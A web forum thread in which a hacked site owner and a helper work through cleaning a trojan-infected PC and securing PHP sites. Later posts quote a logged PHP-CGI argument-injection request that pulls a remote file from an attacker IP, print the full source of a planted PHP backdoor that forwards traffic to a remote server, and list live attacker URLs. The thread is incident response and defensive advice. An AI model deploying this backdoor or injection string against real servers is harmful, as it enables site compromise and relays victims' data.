security problems

[gamecoding27]

it seems like every one of my websites which I have saved passwords for within Filezilla (my ftp client) have been hacked.

code has either been inserted into php files and or the htaccess files have been altered so that clicking a link from google to my pages redirects to someone else's website.

My question is do you think that there is a connection between having the passwords saved and the sites being hacked? Does this sound like my computer has a virus?

I also just noticed that when I delete, or copy/paste a file I need to manually refresh for it to show up or disappear.

As for my websites, I did the coding myself and have been lazy on some of my websites where information can be inputted, does it sound like somebody is just taking advantage of that?

Aside from Form inputs, I use javascript http calls often on my websites and it would not be hard to look at the script to see the website address along with the GET array being passed. Do you think that this would be a vulnerability as well?

Other than those two things (form inputs, and GET arrays) can anyone point out some other areas I may need to secure? I have quite a few websites to go through and secure. I want to make a check list of all areas I need to secure. For instance, would my file permissions have anything to do with this?

thanks for any advice.

[PC-XT]

To check for spyware on your computer, follow the instructions in the READ & RUN ME FIRST Malware Removal Guide

A good help in securing your sites using GET requests is often to look at the log files for strange things like SQL or PHP code to know what people have tried. If they have gained enough access, they can change the log files, though, so this isn't always accurate.

The way to secure user input is to not use any user value, (even select boxes or checkboxes, which can be edited by those who know how,) until it's been filtered for SQL, PHP, JavaScript, VBScript, CSS, HTML, or any other languages the variable may come in contact with. (Filter on the server. Filtering in the client can be bypassed.) If it's a number, parsing it into a numeric variable is usually sufficient. Never insert a raw input directly into SQL, eval, or the like, because that will make injection attacks very easy.

Searching for "protecting against php injection attacks" will give a lot of advice. It's good to look at more than a few pages, because they too often miss some small thing that an attacker won't.

[gamecoding27]

Thank you for the information, I will go read around right now.

By the way I do have a good idea how I can secure the inputs, I am mainly wondering if anyone knows of any common ways besides address GET and form GET and POST inputting that I should be aware of?

[gamecoding27]

Hey guys I have a quick question while I am going through the README & RUNME FIRST

I was just checking my list of start up items and I noticed a weird one: 'Ruabomgu'

which runs command 'C:\Users\xyz\AppData\Roaming\Sygegy\ihig.exe'

I checked inside of the Roaming folder and noticed that a lot of my programs which require passwords, including my FTP program which I think someone stole my passwords from are all listed in the Roaming folder. Is the roaming folder a vulnerability?

I would imagine that the README & RUNME FIRST might fix this, I am just trying to understand how they got my information.

[PC-XT]

I can't find anything about Ruabomgu or Sygegy, so I assume it's not a common startup item, and the names sound suspicious. If, for some reason, the READ & RUN ME FIRST guide doesn't take care of it, ask in the malware section, attaching the logs. Approved volunteer malware experts give one-on-one help there, as they have time. It's the best free help for this stuff that I've found.


Alternative inputs:
You can input via http headers using AJAX, but they are less compatible with some implementations, and they aren't usually used to transfer large blocks of information. I've also heard of using custom methods in forms, but it's still basically the same as GET or POST.

The way input is received doesn't really matter in server security, since someone who knows how can still change the inputs at will. Changing the method will just delay this. The server should filter all the inputs as if they could contain malicious code before using them, regardless of how they arrived.

[gamecoding27]

When you say that the server should filter it, do you mean server-side coding (php) instead of front end (javascript) ?

I am asking because my hosting company is telling me that the security has nothing to do with their servers and everything to do with the code being vulnerable.

[PC-XT]

Yes. When I said server, I meant the code that takes the relevant input, processes it, and replies to the client. It's good to validate stuff with JavaScript, too, but the server (whatever code uses the validated stuff) can't rely on it actually being validated. I don't know if that is an issue with your code, but I see too many vulnerabilities in general from this, so I mentioned it. It's more of a problem with AJAX, because JavaScript must be turned on for it to work, so it's easier to rely on it too much, forgetting that it can be circumvented.

Sorry for the confusion. I hope it's not too hard to get rid of the spyware, if that's what it is, and any code vulnerabilities.

[gamecoding27]

PC-XT, thank you very much for the help. I did have a trojan virus on my computer but it was easy to get rid of.

My websites had about 30 htaccess files and code inserts throughout.

As for using javascript, do you just mean like urlencode? or what else would you do?

[gamecoding27]

quick update..I was searching through my log files today after restoring my pages and adding some security features. One of the lines caught my eye:

"GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.83%2Finfo3.txt HTTP/1.1" 200 8346


that specific index file does not use the GET array. it looks suspect to me but I am not exactly sure what it is doing. the info3.txt looked like the end of a file so I went searching through my directories for it, I did not find it. But I did find what appears to be a trojan gateway type of PHP file which I did not create. it was called "ok.php" I am trying to understand how someone can add a PHP file to my website, would they need my password or is some type of cross browser scripting possible to create a new php file like this:


<?php
//URL оригинального �ервера.
$url = "http://77.91.204.236/celka/update.php";

@error_reporting(0); @set_time_limit(0);

//Коннектим�� к оригинальному �ерверу.
$url = @parse_url($url);
if(!isset($url['port']))$url['port'] = 80;
if(($real_server = @fsockopen($url['host'], $url['port'])) === false)die('E1');

//Получаем данные дл� пере�ылки.
if(($data = @file_get_contents('php://input')) === false)$data = '';

//Формируем запро�.
$request = "POST {$url['path']}?ip=".urlencode($_SERVER['REMOTE_ADDR'])." HTTP/1.1\r\n";
$request .= "Host: {$url['host']}\r\n";

if(!empty($_SERVER['HTTP_USER_AGENT']))$request .= "User-Agent: {$_SERVER['HTTP_USER_AGENT']}\r\n";

//$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Content-Length: ".strlen($data)."\r\n";
$request .= "Connection: Close\r\n";

//Отправл�ем.
fwrite($real_server, $request."\r\n".$data);

//Получаем ответ.
$result = '';
while(!feof($real_server))$result .= fread($real_server, 1024);
fclose($real_server);

//Выводим ответ.
echo substr($result, strpos($result, "\r\n\r\n") + 4);
?>



EDIT: I did a search on that last bit:
http%3A%2F%2F81.17.24.83%2Finfo3.txt
which when I looked at it closer is clearly:
http://81.17.24.83/info3.txt

they are talking about cross browser scripting attempts using the same line that I am seeing in my log file. anyone familiar with how they get that back door file onto your site in the first place? is that the same as XSS?

[gamecoding27]

bingo: http://81.17.24.83/info2.txt - i just started changing the number on info#.txt and came across that file.
it is the code that has been getting inserted into my files.

[gamecoding27]

guys do not open the website link that I posted: http://81.17.24.83/info2.txt

it believe it gave me a trojan when I went to it, plus they got my IP and started attacking my computer...

i just ran superantivirus and re-installed mozilla. it seems that mozilla and chrome are both hijacked. when I try to come to this website, "majorgeeks.com" i am sent to hotmail login.

internet explorer is the only browser I can get to come here

[PC-XT]

Sometimes leaving your modem off for a while will change your ip. http://forums.majorgeeks.com/showthread.php?t=223570

The Malware Removal section helps with hijacked or redirecting browsers, too.

The -d switches in the url were attempts to override options in the php.ini file, like using ini_set(). I don't know if they were successful or not. You could try overriding a php.ini option in this way for a test php file that just displays their values to see if it's a vulnerability:
.../test.php?-doption=value
I found the same attack on another site. Since the given file apparently doesn't exist, it's probably just used to mark the ip as vulnerable to attack.

It is possible to use php injection to add a file, if they can get php code to execute.

By JavaScript validation, I mean checking that things sent to the server are in the right range and format that is expected by the server, so that it doesn't need to send as many error messages. It saves time and bandwidth, but technically doesn't improve security. The server code should still do the same checks, either way.

[gamecoding27]

PC-XT, thanks for responding again.

I talked to my internet company and they told me it resets every 24 hours but they reset it for me right then.

The malware removal section cleared the hijacked browsers right up (specifically combo fix)

in my php.ini file all of the variables they are trying to manipulate are set at the values they are trying to set, besides the "-dauto_prepend_file" which is NULL

Do you know what safe mode is? is it normally on?

[gamecoding27]

PC-XT thanks for responding again.

The malware removal got rid of the browser problem with no problems. specifically combo fix.

I contacted my internet company and they told me that my IP changes every 24 hours but they changed it right then to be safe.

It looks like all of the values are set like they want in the php.ini with the -d switches they are running. except for the last one with the url. -dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.83%2Finfo3.txt HTTP/1.1" 200 8346

those don't seem like safe settings but I am not familiar with what those values were before they were messing with them.

I will do like you said and test that command myself.

[gamecoding27]

Quote:

You could try overriding a php.ini option in this way for a test php file that just displays their values to see if it's a vulnerability:
.../test.php?-doption=value

PC-XT thank you for responding again. When you say that those switches override them, do you mean that they will change the values in the file? or just "override" the value in the file or ignore it and use the value they are passing in?

and when you say to test the values, would you just do php_info() or what do you mean?

thanks for all of the other detail too

[PC-XT]

I'm glad to hear problems are getting fixed.

safe mode is off by default, unless the host requires it to be on. I believe it has been removed from the latest version of PHP. It was sort of a hack to correct for systems that didn't provide adequate security.
http://www.php.net/manual/en/features.safe-mode.php
http://www.php.net/manual/en/feature....functions.php
http://www.php.net/manual/en/ini.sect.safe-mode.php
http://docs.joomla.org/Why_shouldn%2...P_safe_mode%3F

As for the test PHP file, it could be just
<?php
echo(ini_get('safe_mode'));
?>
with whatever settings you are trying to override via the -d switch. If it does override settings, I think it's just for that particular time the script and any included files are called, ignoring the ini file, but I'm not sure. The command line options are listed here, but they may work differently in a url, if they even work at all:
http://www.php.net/manual/en/feature...ne.options.php

This might be another test file:
<?php
phpinfo(4);
?>
I'm not sure which is best.

[gamecoding27]

PC-XT, thanks again for all of your help buddy. someone passed me along this link: https://bugs.php.net/bug.php?id=61910

it turns out that it was fixed in a recent php patch. For anyone on an older version of php (or non apache i think) there is a htaccess bit in the comments that prevents the -d -s and other switches from being used in the URL